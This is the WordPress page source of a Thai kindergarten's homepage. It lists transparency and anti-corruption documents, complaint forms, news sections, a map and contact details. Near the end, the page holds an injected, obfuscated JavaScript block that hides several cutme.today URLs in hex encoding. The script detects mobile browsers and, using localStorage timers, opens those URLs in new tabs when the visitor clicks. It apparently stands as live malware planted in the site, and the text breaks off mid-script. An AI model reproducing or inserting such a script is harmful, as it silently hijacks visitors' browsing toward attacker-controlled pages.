data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else 